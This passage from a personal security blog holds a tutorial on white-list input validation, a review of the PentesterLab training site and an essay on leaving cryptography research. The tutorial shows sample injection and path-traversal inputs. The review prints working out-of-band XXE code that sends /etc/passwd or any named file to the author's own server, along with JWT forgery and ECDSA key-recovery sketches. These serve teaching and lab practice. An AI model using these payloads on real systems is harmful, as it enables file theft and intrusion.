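    # letters plus hyphen, space, comma, full stop, and apostrophes
    return (0 < len(s) <= MAX_NAME_LEN
            and re.fullmatch(r"[A-Za-z'’ ,.\-]+", s) is not None)

def valid_email(s):
    # deliberately simple shape check; published regexes are stricter
    return (len(s) <= 254
            and re.fullmatch(r"[^@\s]+@[^@\s]+\.[^@\s]+", s) is not None)

def valid_quantity(s):
    # integers 0..99 only, as in the ecommerce example
    return re.fullmatch(r"[0-9]{1,2}", s) is not None
```

Anything failing a check should be rejected with a 400 status code, as described above.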

There are two types of input validation strategies: white list and black list. The examples above are white list — we have said exactly what is allowed and anything else is rejected. The alternative approach, black list, tells what is not allowed and accepts everything else. White list validation is a general defence that is not targeted towards a specific attack, and can often stop attacks that you may not foresee. On the other hand, black list validation rules out dangerous characters for a specific attack that you have in mind. Black list should never be relied upon by itself — we will talk more about that in the next section.

When and how to do it?

Validation must happen on the server side, and should be done before you do anything else with the data.

It’s not unusual to see client side validation (for usability), but if you do not also validate on the server side (for security), then it will stop your kid sister and nobody else. Remember, web hackers do not need to run the same JavaScript code that you serve to them. Most of the time, they are going to use an intercepting proxy to modify the request after it leaves the browser but before it reaches the server. For example, see this video.  [Footnote: there are some edge cases where client side input validation makes sense for security, such as DOM based XSS, but these are advanced topics that are beyond the scope of this blog.]

What should be validated? Any data that you use that an attacker can manipulate. For web applications, this includes query parameters, http body data, and http headers. For emphasis, you don’t need to validate every http header — instead, only validate the ones that your application uses somewhere in the code. I’ve seen a number of cases where applications use http headers such as User-Agent without realising that an attacker could put anything he wants for such values. For example, with curl one would just use the -H option.

Validation should be done immediately, before anything else (including logging) is done with the data. I’ve seen cases where developers tried to validate strings that were formed by concatenating fixed values with user input. Because the validation happened on the result of the string concatenation, the validation routine had to be liberal enough to allow every character in the fixed string. But one of the characters in the fixed string was key to allowing the attacker to supply his own malicious input. Since the validation had to allow it when coded this way, a hack was trivial to pull off.

MVC frameworks such as .NET and Spring have good documentation on how to do input validation. For example, Microsoft has nice pages about input validation in various versions of ASP.NET MVC. Similarly, Spring has documentation, and additional guidance can be found in various places.  In other cases, you might use a framework designed specifically for data validation, or write custom validation methods.

Importantly, white list validation must always be done. Black list validation can supplement white list validation, but it cannot be relied upon by itself to stop an attack. The reason is that hackers are very good at finding ways around black list validation.

Yes, it is your responsibility

The diagram below depicts an example that I have seen a number of times, especially in microservices architectures.  System A receives data from the user, and passes it off to internal System B.  System B processes the data.  Where should input validation happen?


The developers of System A believe they are mainly acting as a proxy, and therefore the responsibility for input validation lies with System B.  On the other hand, the developers of System B believe they are getting data from an internal trusted source (System A), and therefore the responsibility for validating it lies with System A.  As a consequence, neither development team validates the data.  In the event that they get hacked, everyone has an excuse on why they didn’t do it.

The answer is that both are responsible for validating their input data.

System A needs to validate because otherwise it is vulnerable to various injection attacks when the data gets sent to System B, such as json injection or http header injection.  System B should validate its data because the muppets who wrote System A rarely do any meaningful validation on the data they pass along.  In summary, no matter where you are developing, you need to validate your input.  Don’t assume that somebody else is going to do it for you, because they won’t.

What about input sanitisation?

Sanitisation refers to changing user input so that it becomes not dangerous. The issue here is that what is dangerous depends upon the context in which it is used.

For example, suppose some user input is first logged and then later displayed to the user in his browser. In the context of logging, the dangerous characters are new lines (ASCII value 10) and carriage returns (ASCII value 13), because they allow an attacker to create a new line in your log file containing anything he wants, an attack known as log forging (discussed in more detail in the examples below). On the other hand, when the input is displayed to the user, the dangerous characters become those that the browser can interpret to do something the web designer did not intend: the characters < > / and “ are the first that come to mind (normally we escape these characters).

It is not unusual for developers to get this wrong.  I have seen more than once the use of the OWASP Java HTML Sanitizer to attempt to sanitise data written to the log.  Wrong tool, wrong context.

Because sanitisation depends upon context, it is not desirable to try to sanitise inputs at the beginning in such a way that they will not be dangerous when later used. In other words, input sanitisation should never be used in place of input validation. Input validation should always be done.  Thus, even if you get the sanitisation wrong (e.g. see previous paragraph), input validation will often save you.

Note also that the concept of input sanitisation is making us think in a black list approach rather than a white list approach, i.e. we are thinking about what characters might be harmful in a specific context and what to do with them. This is another reason why input sanitisation should not displace input validation. Even very good developers  have learned this the hard way.

The bottom line is that white list input validation is a general defence, whereas input sanitisation is a specific defence. General defences should happen when input comes in (at “source”), specific defences should happen when the data is later used (at “sink”). Never omit the general defence.


We have given the guidance, but now let’s justify it with examples. Let’s see how input validation can often save us when proper coding defences are lacking somewhere else in the code base. An important takeaway is that even though input validation does not stop everything, it certainly stops a lot, and makes other attacks a lot harder. Given how easy the validation is to perform, the bang-for-your-buck analysis dictates always doing it.

Example: SQL injection

SQL injection vulnerabilities are most often due to forming SQL queries using string concatenation/substitution with user input. A typical example looks like this (Java):

String query = "SELECT * FROM User where userId='" + request.getParameter("userId") + "'";  // vulnerable

To get all users, the attacker can send the following for the userId parameter: xyz' or 1=1 --
That malicious input will change the query to:

SELECT * FROM User where userId='xyz' or 1=1 -- '

The attacker can do much more than this with more clever inputs, including fetching other columns or deleting the entire database. However, sticking to the simple example, notice the tools the attacker is using: the single quote to end the userId part of the query, the white spaces to add other statements, the equal to make a comparison that is always true, and the double dash to escape the remaining part of the query.

The proper defence against SQL injection, which should always be done, is either prepared statements or parameterised queries. However, let’s consider what would happen if the developer had validated the input but still formed the query with string concatenation.  In this case, the code might look like:

// This code is still wrong, but it is better than above
String userId = request.getParameter("userId");
if ( !validateUserId( userId ) ) {
    // Handle error condition, return status code of 400
    return;
}
String query = "SELECT * FROM User where userId='" + userId + "'"; // <--- Don't do this!

For data types like user ids, phone numbers, quantities, email addresses, and many others, input validation would not have allowed the single quote, which has already stopped the attack. However, for a field like a last name, a single quote must be allowed or else O’Malley will throw a fit.

Still, input validation would not have allowed the equal character in the last name and some other characters that attackers like to use. Additionally, limiting the number of characters that an attacker can provide (example: 40 for last name) would also impede the attacker. Truthfully, a good hacker would still succeed in getting an injection, but you might have stopped the script kiddie. The lesson here is: Just because you validated the data does not mean that you can be sloppy elsewhere.
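For contrast, the proper defence is tiny. A sketch using Python's sqlite3 module (the table and data are illustrative) shows that with a parameterised query the classic injection input matches nothing, because the driver keeps it as data rather than splicing it into the SQL:

```python
# Parameterised query demo: the attacker's input stays data, not SQL.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE User (userId TEXT, name TEXT)")
conn.execute("INSERT INTO User VALUES ('abc123', 'Alice')")

def get_user(user_id):
    # ? is a placeholder; the driver binds user_id safely
    return conn.execute(
        "SELECT * FROM User WHERE userId = ?", (user_id,)).fetchall()

print(get_user("abc123"))          # the legitimate row
print(get_user("xyz' or 1=1 --"))  # [] -- the injection is inert
```

The same placeholder idea exists in every mainstream database driver, only the placeholder syntax varies.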

A great website that shows how to code SQL queries safely in various languages is Bobby Tables. They have a nice comic, but unfortunately the punch line is wrong:


As the website correctly says on its about page, the answer is not to “sanitize your database inputs” yourself, which is prone to error. Instead, use prepared statements or parameterised queries.

Example: Log forging

A well written application should have logging throughout the code base. But logging user input can lead to problems. For example (C#):

log.Info("Value requested is " + Request["value"]); // vulnerable

Log files are separated by newlines or carriage returns, so if the value from the user contains a newline or a carriage return, then the user is able to put anything he wants into your log file, and it will be very hard for you to distinguish between what is real versus what was written by the attacker. If you did proper validation of your input, there are not many cases where one would allow newlines and/or carriage returns, so the validation would usually save you.

For a good technique to prevent log forging, see this nice blog by John Melton (the same concept works regardless of language).
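The essence of that technique can be sketched in a few lines (the function name is mine): encode carriage returns and newlines before the value ever reaches the log, so a forged entry cannot start a new log line.

```python
# Neutralise the two characters that enable log forging by encoding them.
def log_safe(value: str) -> str:
    return value.replace("\r", "%0d").replace("\n", "%0a")

# An attempt to forge an 'admin logged in' line stays on one line:
entry = "Value requested is " + log_safe("42\nINFO admin logged in")
print(entry)
```

Note this is a sink-specific defence for the logging context, which complements (not replaces) the white list validation done at the source.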

Example: Path manipulation

Many web applications these days allow the user to upload to or read something from the server file system. It is not unusual for the file name to be formed by concatenating a fixed path with a file name provided by the user (C#):

String fn = Request["filename"]; // fn could have dangerous input
String filepath = USER_STORAGE_PATH + fn;
String[] lines = System.IO.File.ReadAllLines(filepath); // vulnerable

The above example does not validate the user provided filename, but normally a filename would only allow alphanumeric characters along with the ‘.’ for file extensions.

The risk here is that a user provides a file name of something like ../../../system_secrets.txt (fictional file name), which allows the attacker to read the system_secrets.txt file outside the USER_STORAGE_PATH path. Note that input validation would not have prohibited the use of ‘.’, but it would have prevented the attacker from using the forward or backward slash, which is key to his success.

More generally, I don’t recommend that users should be able to provide the direct file names to access, and storage should be on a separate system. But even if you go against that advice, proper input validation will save you from path manipulation.
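If you do go against that advice and let users name files, a defence in depth check (sketched in Python; the base path is illustrative) is to resolve the final path and reject anything that escapes the storage directory:

```python
# Resolve the final path and refuse anything outside the base directory.
# Combine this with white list validation of the filename's characters.
import os

USER_STORAGE_PATH = "/srv/app/userfiles"  # illustrative base directory

def safe_path(filename: str) -> str:
    path = os.path.realpath(os.path.join(USER_STORAGE_PATH, filename))
    if not path.startswith(USER_STORAGE_PATH + os.sep):
        raise ValueError("path traversal attempt")
    return path
```

realpath collapses any ../ sequences (and symlinks), so the startswith check sees the path that would actually be opened.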

Example: Server side request forgery

This is a nice example because not many people know what server side request forgery is, yet it has recently become quite a nice tool in hackers’ toolboxes.

Consider that your web application might initiate an http request, where the destination of that request is somehow formed from user input. One might think that making the http request from the server is benign, because it is no different from the user making a similar request from his browser. But that reasoning is wrong, because the request from your server has access to your internal network, whereas the user himself should not.

An example is insightful. The website InterviewCake teaches developers how to solve difficult job interview questions. From the website, you can actually write code in a number of different languages and run it, which runs in an AWS environment. It was then too easy for Christophe Tafani-Dereeper to write some simple python code on InterviewCake that reveals AWS security credentials from the private network that the application was hosted on:


This type of attack is common in AWS environments: learn about AWS Instance Metadata from Amazon.

Of course, allowing users to run arbitrary code in an environment that you host is extremely dangerous and is hard to defend against. More often we see cases like the following from StackOverflow (PHP):


In the above example, the server gets the url of a file from a query parameter.  It assumes that the file type is either gif, png, or jpg, and then serves that content to the client.  The only validation check is that the protocol is http (or https).

Although the code appears to restrict to gif, png, or jpg files, the default case simply reads the content regardless of type. An attacker can thus request anything he wants, and the request is made with the server’s privileges from inside your network.

To fix it, the server needs to validate that the incoming url is allowed to be accessed by the user. This can be done by verifying that the url matches a white list of allowed URLs. In this case, white list validation defeats the attack completely (when implemented properly), and no other defence is needed.
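A sketch of such a white list check (Python; the allowed hosts are illustrative):

```python
# White list check for outbound URLs: both the scheme and the exact
# hostname must be on the allowed list before the server will fetch it.
from urllib.parse import urlparse

ALLOWED_HOSTS = {"images.example.com", "cdn.example.com"}  # illustrative

def is_allowed(url: str) -> bool:
    parts = urlparse(url)
    return (parts.scheme in ("http", "https")
            and parts.hostname in ALLOWED_HOSTS)
```

Matching the exact hostname (rather than a substring) matters: substring checks are easily bypassed with tricks like evil.com/?x=images.example.com.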

Example: Cross site scripting

Cross site scripting (XSS) is an old vulnerability that is still a major problem today. There are three types of XSS, but we’re not going to that level of detail. XSS happens when untrusted input (typically user input) is interpreted in a malicious way in another user’s browser. Let’s look at a simple example (Java JSP):

<% String name = request.getParameter("name"); %>
Name provided: <%= name %>

If the input provided contains the query parameter


then that JavaScript will execute in a user’s browser. This type of XSS (reflected XSS) is typically exploited by user A emailing a link to user B with the malicious JavaScript embedded in it.

The proper defence for XSS is to escape the untrusted input. In JSP, this can be done with the JSTL <c:out> tag or fn:escapeXml(). But this needs to happen everywhere untrusted data is displayed, and missing one place can result in a critical security vulnerability.

Similar to other examples, input validation will often save you in the event that you missed a single place where the output needs to be escaped. As noted above, the characters < > / and ” are particularly dangerous in the context of html. These characters are rarely part of a white list of allowed user input.
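For illustration, in Python the escaping defence is a single call: html.escape turns each dangerous character into an entity, so the browser displays the input as text instead of executing it.

```python
# Output escaping for the html context: dangerous characters become entities.
import html

name = '<script>alert("hello")</script>'
print("Name provided: " + html.escape(name))
# Name provided: &lt;script&gt;alert(&quot;hello&quot;)&lt;/script&gt;
```

As with log forging, this is a sink-specific defence for the html context; JSP's <c:out> and fn:escapeXml() mentioned above do the same job.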

Despite the dire warnings above, it is great to know that there are frameworks like Angular that escape all inputs by default, thus making XSS extremely unlikely to happen in that framework. Secure by default — what a novel concept.


White list input validation should always be done because it prevents a number of attacks that you may not foresee. This technique should happen as soon as data comes in, and invalid input should be rejected without further consideration. Input validation is not a panacea, so it should be coupled with specific defences that are relevant to the context in which the data is used. Input validation should be applied at the source, whereas the other specific defences are applied at the data sinks.

A Review of PentesterLab


After completing my fourth badge on PentesterLab, I have enjoyed it so much that I thought I would pass on the word about what a great learning resource it is. If I had to summarise it in one sentence, I would say it is an extremely well written educational site about web application pentesting that caters to all skill levels and makes it easy to learn at an incredibly affordable price (US$20 per month for pro membership, with no minimum number of months and no annoying auto-renewal at signup). If you are uncertain whether it is for you, start by checking out the free content.

Without pro membership, you can still download many ISOs and try the exercises yourself locally. However, with pro membership you get more content, and you avoid the overhead of downloading ISOs, spinning up VMs, and related activities.

This blog is about what you will get out of it and what you should know going in. In my opinion, the best way to do justice in describing PentesterLab is to talk about some of the exercises on the site. So at the end of the blog, I dive down into the technical fun stuff, describing three of my favourites. If none of those exercises pique your interest, then never mind!

For the record, I have no connection to the site author, Louis Nyffenegger. I have never met him, but I have exchanged a few emails with him in regard to permission to blog about his site. My opinion is thus unbiased — my only interest is blogging about things that I am passionate about, and PentesterLab has really worked for me.

What you can expect to learn

A few examples of what you can expect to learn from PentesterLab:

  • An introduction to web security, through any of the Web for Pentesters courses or Essential badge or the Introduction badge or the bootcamp.
  • Advanced penetration testing that often leads to web shells and remote code execution, in the White badge, Serialize badge, Yellow badge, and various other places. Examples of what you get to exploit include Java deserialization (and deserialization in other languages), Shellshock, out of band XXE, recent Struts 2 vulnerabilities (CVE-2017-5638), and more.
  • The practical experience of breaking real world cryptography through exercises such as Electronic Code Book, Cipher Block Chaining, Padding Oracle, and ECDSA. Note: Although the number of crypto exercises here cannot compete with CryptoPals (which is exclusively about breaking real world cryptography), at least at PentesterLab you get certifications (badges) as evidence of your acquired skills.
  • Practical experience bypassing crypto when there is no obvious way to break it, such as in API to shell, JSON Web Token, and JSON Web Token II.
  • Practical experience performing increasingly sophisticated man-in-the-middle attacks in the Intercept badge.
  • Fun challenges that will really make you think in the Capture the flag badge.

The author is updating the site all the time, and it is clear that more badges and exercises are on the way.

In addition to learning lots of new attacks on web applications, I can also say that I personally picked up a few more skills that I was not expecting:

  • Learning some functionality of Burp Suite that I had not known existed. I thought I knew it well before I started, but it turns out that there were a number of little things I did not know, often picked up by watching the videos (only available via pro membership).
  • Learning more about various types of encoding and how to handle them in the language of my choice (in my case, Python). The site did not hand me the Python functionality I needed; I was drawn to learn it while trying to solve various challenges. For example, I now know how the padding works in base64 (important because not all of the encodings I got from challenges could be fed directly into Python), and I learned about the very useful urllib.quote.
  • Getting confidence in fiddling with languages that I had little experience in, such as PHP and Ruby.
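As an illustration of the encoding point, here is roughly how those two pieces look in Python 3 (the token value is my own toy example, and urllib.quote from Python 2 lives at urllib.parse.quote in Python 3):

```python
import base64
from urllib.parse import quote  # urllib.quote in Python 2

# base64 output length must be a multiple of 4; challenges often strip the '='
token = "aGk"                              # 'hi' with its padding removed
padded = token + "=" * (-len(token) % 4)   # restore padding before decoding
print(base64.b64decode(padded))            # b'hi'

# percent-encode a payload before putting it in a URL
print(quote("a=1&b=2"))                    # a%3D1%26b%3D2
```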

What you should know going in

What you need depends upon what exercises you choose to do, but I expect most people will be like me: wanting to get practical experience exploiting major vulnerabilities that don’t always fall into the OWASP Top 10. For such people, I say that you need to be comfortable with scripting and fiddling around with various programming languages, such as Ruby, PHP, Python, Java, and C. If you haven’t had experience with all of these languages, that’s okay: there are good videos (pro membership) that help enormously. The main thing is not to be afraid to try, and there may be times when you need to Google for an answer. But most of the time, you can get everything you need directly from PentesterLab.

I personally like to use Cygwin on Windows and/or a Linux virtual machine. The vast majority of the time, I was able to construct the attack payload myself (with help from PentesterLab), but there are a few exercises such as Java Deserialization where you need to run somebody else’s software (in this case, ysoserial). Although that comes from very reputable security researchers, being ultra-paranoid, I prefer to run software I don’t know on a virtual machine rather than my main OS.

If you are an absolute beginner in pentesting and have no experience with Burp, I think that you will be okay. But you will likely depend upon the videos to get you started. The video in the first JWT exercise will introduce you to setting up Burp and using the most basic functionality that you will need. By the way, I have done everything using the free version of Burp, so no need to buy a licence (until you’re ready to chase bug bounties!)

Quality of the content

For each exercise there is a course with written material, an online exercise (pro membership only — others can download the ISO), and usually there are videos (pro members only).

You can see examples of the courses in the free section, and I think the quality speaks for itself. With pro membership, you get a lot more of this high quality course material. The only thing that I would suggest to the author is that including a few more external references for interested readers could be helpful. For example, the best place to learn about Java deserialization is Foxglove Security, so it would be great to include the reference.

The videos really raise the bar. How many times have you struggled through a YouTube video showing how to perform an attack, frustrated by the presentation? You know, those videos where the author silently stumbles through typing the attack description, with bad music in the background? Maybe you had to search a few times before finding one that was reasonably okay. Well, not here: all the videos are very high quality. The author talks you through each attack and has clearly put a lot of thought into explaining the steps to those who do not have experience or background with it.

Last, the online exercises are perfect: simple and to the point, allowing us to try what we learned.

Sometimes the supporting content is enough for you to do an entire exercise, other times you have to think a bit. Many videos are spoilers — they show you how to solve the exercise completely (or almost completely), but it is usually best to try yourself before falling back to the videos: you won’t get more out of it than what you put into it.

Finally, I want to compare the quality of PentesterLab to some other educational material that I have learned a lot from:

  • OSCP, which is infrastructure security as opposed to the web application security of PentesterLab. OSCP is the #1 certification in the industry, at a very reasonable price, and it also has top-quality educational material. I learned a lot doing OSCP, but the problem is that I did not complete it: I ran out of time to work on it (my wife and kids were beginning to forget who I was). And despite having picked up so many great skills from enrolling, at the end of the day it never helped me land a pentester job close to my desired salary level. I guess I needed to just try harder. The great thing about PentesterLab is that it’s not an all-or-nothing deal: you will pick up certification (badge) after certification (badge) as you go along. In terms of quality, I’d say PentesterLab material is on par with OSCP.
  • Webgoat is the go-to free application for learning about penetration testing. I played with it a few years ago and learned a fair amount. There were a few exercises that I did not know how to solve, and I was rather frustrated that the tool did not help me. For example, in one of the SQL injection exercises, I needed to know how to get the column names in the database schema in order to solve it (I want to understand rather than just sqlmap it). I really think the software should have provided me some guidance on that (I know how to do that now, thanks to PentesterLab). PentesterLab just provides a lot more guidance and support, and has a lot more content.
  • Infosec Institute in my experience has been a fantastic source of free information to help learn application security. It covers a wide variety of topics in very good detail. But it lacks the nice features you get with PentesterLab pro membership: videos, and the ability to try online without the overhead of fetching resources from other places to get set up.  If your time is precious, the US$20 per month is nothing in comparison to what you gain from PentesterLab pro.

What most amazes me is that just about all of the content here was primarily made by a single person. Wow.

Three example exercises I really liked

Exercise: Play XML Entities (Out of band XXE)

XXE is a fun XML vulnerability that can allow an attacker to read arbitrary files on the vulnerable system. Although many XXE vulnerabilities are easy to exploit, there are other times where the vulnerability exists but the file you are trying to read from the OS does not get directly returned to you. In such cases, you can try an out of band XXE attack, which is what the Play XML Entities exercise is all about.

In the course the author provides an awesome diagram of how it all works, which he explains in detail:


(Diagram copyright Louis Nyffenegger, used with his permission).

Briefly, the attacker sets up his own server (“Attacker’s server” in the diagram) that serves a DTD. The attacker sends malicious XML to the vulnerable server (step 1), which then remotely retrieves the attacker’s DTD (steps 2-3). The DTD instructs the vulnerable server to read a specific file from its file system (step 4) and send it to the attacker’s server (step 5).
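Sketched in Python, the step-1 payload might look something like this (the hostname, path, and entity name here are placeholders of my own, not values from the course):

```python
# Hypothetical step-1 payload: the XML the attacker submits to the vulnerable
# server, pointing its parser at the attacker's external DTD. The served DTD
# then defines the entity e1 that exfiltrates the target file.
malicious_xml = '''<?xml version="1.0"?>
<!DOCTYPE data SYSTEM "https://my-app.herokuapp.com/dtd">
<data>&e1;</data>'''
print(malicious_xml)
```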

So to start out, you need your own web server that the vulnerable application will fetch a DTD from. In this case, you are a bit on your own about which server to use. I personally have experience with Heroku, which lets you run up to 5 small applications for free.

PentesterLab shows how to run a small Webrick server (Ruby), but I’m more of a Python guy and my experience is with Flask. Warning: Heroku+Flask has been a real pain for me historically, but I now have it working so I just continue to go with that.

To provide a DTD that asks for the vulnerable server to cough up /etc/passwd, I did it like this in Flask:

@app.route('/dtd')   # assumes a Flask app object exists
def testdtd():
    # the hostname below is a placeholder for my own Heroku app's recorddata endpoint
    dtd = '''<!ENTITY % p1 SYSTEM "file:///etc/passwd">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'https://my-app.herokuapp.com/recorddata?data=%p1;'>">
%p2;'''
    return dtd

The recorddata endpoint is another Flask route (code omitted) that records the /etc/passwd file retrieved from the vulnerable server (my DTD is essentially equivalent to the one from PentesterLab).

This is all fine and dandy except one thing: /etc/passwd is not the ultimate goal in this exercise. Instead, there is a hidden file on the system somewhere that you need to find, and it contains a secret that you need to get to mark completion of the exercise. So, a static DTD like this doesn’t do what I need.

At first, I was manually changing the DTD every time to reference a different file, then re-deploying to Heroku, and then trying my attack through Burp. I thought I would find the secret file quickly, but I did not. This was way too manual, and way too slow. What an idiot I was for doing things this way.

Then I used a little intelligence and did it the right way: make the Flask endpoint take the file name as a query string parameter, and return the corresponding DTD:

from flask import request

@app.route('/dtdsmart')   # assumes a Flask app object exists
def dtdsmart():
    # e.g. /dtdsmart?f=etc/hosts (the parameter name is my own choice)
    targetfile = request.args.get('f', 'etc/passwd')
    dtd = '''<!ENTITY % p1 SYSTEM "file:///''' + targetfile + '''">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'https://my-app.herokuapp.com/recorddata?data=%p1;'>">
%p2;'''
    return dtd

I was very proud of myself for this trivial solution. Never mind the security vulnerability in it!

Overall, the course material gives a great description on what to do, but sometimes you have to bring in your own ideas to do things a better way.

Exercise: JWT II

JSON Web Tokens (JWTs) are a standard way of communicating information between parties in a tamper-proof way. Except when they can be tampered with.

In fact, there is a fairly well known historical vulnerability in a number of JWT libraries. The vulnerability is due to the JWT standard allowing too much flexibility in the signing algorithm. One might speculate why JWTs were designed this way.

PentesterLab has two exercises on bypassing JWT signatures (pro members only). The first one is the most obvious way, and the way you would most likely pull it off in practice (assuming a vulnerable library). The second is a lot harder to pull off, but a lot more fun when you succeed.

In JWT II, your username is in the JWT claims, digitally signed with RSA. You need to find a way to change your username to ‘admin’, but the signature on it is trying to stop you from doing that.

To bypass the signature, you change the algorithm in the JWT from RSA (an asymmetric algorithm) to HMAC (a symmetric algorithm). The server does not know that the algorithm has changed, but it does know how to check signatures. If it is instructed to check the signature with HMAC, it will do so. And it will do it with the key it knows — not an HMAC key, but instead the RSA public key.

In this exercise, you are given the RSA public key, encoded. At a theoretical level, exploiting it may seem easy: just create your own JWT having username ‘admin’, set the algorithm to HMAC, and then sign it by treating the RSA public key like it is an HMAC key.
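As a sketch, the forgery needs nothing beyond the standard library. The key value below is a placeholder: the hard part in practice is exactly which bytes of the public key (PEM text, DER, trailing newline or not) the server feeds to HMAC.

```python
import base64, hashlib, hmac, json

def b64url(data: bytes) -> str:
    # JWT uses base64url with the '=' padding stripped
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

# Placeholder: the server's RSA public key, used verbatim as the HMAC secret
public_key = b"-----BEGIN PUBLIC KEY-----\n...\n-----END PUBLIC KEY-----\n"

header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
claims = b64url(json.dumps({"user": "admin"}).encode())
signing_input = (header + "." + claims).encode()
sig = b64url(hmac.new(public_key, signing_input, hashlib.sha256).digest())
forged = header + "." + claims + "." + sig
print(forged)
```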

In practice, it’s not that simple. When I was attempting this, I was completely stuck on not knowing how to treat an RSA key as an HMAC key. I tried it in Python, fiddling around with a few different ways of supplying the key to create the signature. None of them worked.

I thought to myself that this depends so much on implementation, and surely there must be a better way of going about things than random trials. Hmmmm, somehow the author must have left a hint on how to encode it so we can solve the exercise…


Exercise: ECDSA

According to stats on the site, the ECDSA exercise looks to be the most challenging one. I decided to go after it because I was once a cryptographer, and I was excited to see an exercise like this.

Honestly, most people will not have the cryptographic background to do an exercise like this, particularly because ECDSA is in the capture the flag badge, so there is no guidance. You are on your own, good luck! But I’ll drop you a hint.

In the exercise, they give you the Ruby source code, which is a few dozen lines. The functionality of the site allows you to register or login only. Your goal is to get admin access.

From the source code you will see that it uses an ECDSA private key to digitally sign a cookie containing your username. To check the cookie, it verifies the signature with the public key.

The most surprising thing here is that you don’t even get the public key (nor the private key, of course). You have to somehow find a way to create a digitally signed cookie with the admin username in it, and you have absolutely nothing to go by other than the source code.

I promised you a hint. Look for a prominent example of ECDSA being broken in the real world.
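At the risk of a mild spoiler, here is the algebra behind that real-world break, demonstrated with toy numbers (a small prime stands in for the curve group order, and no actual curve arithmetic is done):

```python
# ECDSA: s = k^-1 * (h + r*d) mod n, where r is derived from the nonce k.
# If the same k (hence the same r) signs two hashes h1, h2, the key d leaks.
n = 101            # toy stand-in for the curve group order (prime)
d, k = 37, 29      # private key and reused nonce (unknown to the attacker)
r = 15             # pretend x-coordinate of k*G mod n; same in both signatures
h1, h2 = 40, 87    # hashes of the two signed messages

inv = lambda x: pow(x, -1, n)  # modular inverse (Python 3.8+)
s1 = inv(k) * (h1 + r * d) % n
s2 = inv(k) * (h2 + r * d) % n

# The attacker sees (r, s1), (r, s2), h1, h2 and recovers k, then d:
k_rec = (h1 - h2) * inv(s1 - s2) % n
d_rec = (s1 * k_rec - h1) * inv(r) % n
print(k_rec, d_rec)  # recovers the nonce and the private key
```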

Concluding Remarks

I think it is clear that I really, really like this website and highly recommend it. Having said that, it is always better to get more than one opinion, and for that reason, I invite other users of PentesterLab either to comment here or on reddit about their experience with the website.

Speak up people!

Why I left cryptography

This blog is a follow-up on my previous blog, How I became a cryptographer, which describes the very long, intense journey I took to get to the state where I could make a living publishing research in cryptography.  A few people have asked why I left, so here I give my reasons.  This blog may be useful to people who are uncertain whether they want to make a similar journey.

Feeling disconnected from the real world

The biggest reason why I left is that I felt cryptography research was more focused on the mathematics than it was on the real world applicability.  As much as I love the mathematics, algorithms, and puzzle solving, I wanted to work on research that mattered.  But the longer I stayed in cryptography, the more disconnected I felt from the real world.

Truthfully, the restrictions I put on myself limited me: I did not want to leave Sydney and I did not want to spend the majority of my time teaching.  Had I not kept those restrictions, I could have had more chances.  With them, the only job that I found to keep me going was to be a PostDoc research fellow.

As a PostDoc research fellow, you are typically paid by a government research grant that may last a couple of years.  When you are paid by such a grant, you need to deliver results in line with that grant so that, in the future, you have evidence you can use to apply for similar grants to keep you going.  And so the cycle continues.

If you are really good and daring, you might stray from the research grant topic once in a while to see if you can make an impact somewhere else.  But your time for that is very limited.

I started on research grants involving number theory, then moved to research grants about cryptanalysis.  In this time, I got my top two research results, one of which influenced the field but unfortunately will never be used in the real world, the other of which had an important impact on what NIST declares acceptable today.  Also during that time, I did a lot of research that had hardly any relevance to the real world.

While being a PostDoc, I saw a lot of new crypto conferences popping up, and a lot of new crypto researchers publishing at new conferences.  Let’s just say that this was not due to an increase in quality in the field.  Instead, there were more opportunities to publish irrelevant research, which a researcher could use as evidence of making an ‘impact.’

I wanted to know what were the right problems to work on, but the longer I stayed in the field, the less vision I had on where to look.  I was stuck in the cycle, with no vision of what the real world needed.  I simply was not going to get that vision by continuing to do what I was doing.


The science is not maturing

When designing a cipher, every cryptographer will tell you the first requirement.  Nobody will look at it unless it follows Kerckhoffs’ principle: the security of the cipher should depend upon the secret key and nothing else.  No secret algorithms.

With the AES selection competition between 1997-2000, several cryptographers tried to raise the bar.  Instead of just coming up with a design and relying on others to attack it, designers should put in some effort themselves to show that it does not trivially fall to common attacks such as linear and differential cryptanalysis.  I myself worked with the RC6 design team (though I was not a designer myself), and we provided extensive analysis of the security of RC6.  We were proud of this.

However, a competitor algorithm went much further.  Not only did the designers attempt various cryptanalytic techniques against their design, but they also proved (under reasonable assumptions) that the design was resistant to first-order linear and differential cryptanalysis.  The proof was via the Wide Trail Strategy.  Their cipher, Rijndael, was the favourite amongst the majority of cryptographers, and it ultimately won the AES competition.  Even as a competitor to them, I have no doubt in my mind that the right cipher won.

This was great.  With the turn of the 21st century, we had a new standard of excellence.  Moving the bar beyond the 19th-century Kerckhoffs’ principle, we now require designers to put substantial effort into analysing and proving the security of their designs before presenting them to us.  Right?

That was my thought, but it is totally wrong.  For two reasons:

  • With the increase in the number of crypto conferences and crypto researchers, there was no possibility of enforcing a standard of excellence.  The doors were (and still are) wide open to publish a low quality design in a low quality conference.
  • Ultimately a fair number of designs get used in the real world long before going through a rigorous analysis and peer review process.

Sure, some designs start getting attention after they have been in use for a while, and by that time we either find problems in them or else fall back to “this algorithm has been in use for a long time and nobody has found problems with it, therefore we can trust it.”  And thus, the science is not maturing.

It is a lot easier to design something than it is to break it.  For every man-hour spent designing, it can take one or two orders of magnitude more man-hours to analyse, or maybe even more (depending upon the skills of the designer).  Cryptanalysts simply cannot keep up with the designers, so we instead declare that we will not look at their designs for whatever reason.

I wish cryptography would get beyond Kerckhoffs’ principle.  I wish the effort between design and cryptanalysis was more balanced.  I wish we could give designers more practical advice on what it takes for their ciphers to get attention.

I don’t believe that will ever happen.

A lot of labour for little reward

I started out with an attitude like Paul Erdős, but eventually materialism crept in.  It’s a lot easier to be idealistic when you are young and single than it is when you’re beginning to settle down and think about having a family.

As my software skills were dated, I felt very lucky that I could get out when I did.  Fortune brought me to a fantastic printer research company in Sydney that was mainly looking for smart people.  They offered me a good salary, and I was happy to leave cryptography behind.

I was able to maintain a decent salary, but it took me a good 7 years or so before I got to the point where I had strong enough skills in demand so that I could change employment without too much difficulty if I needed to.

Every now and then I get a call from a recruiter about a bank or other large company looking to hire a cryptographer.  They don’t need a researcher, but rather somebody who really knows cryptography and can give advice about it.  I stopped pursuing these potential opportunities: they pay well, but my interests in security go way beyond cryptography, so I don’t want to pigeon-hole myself as a cryptographer only.

What I do today

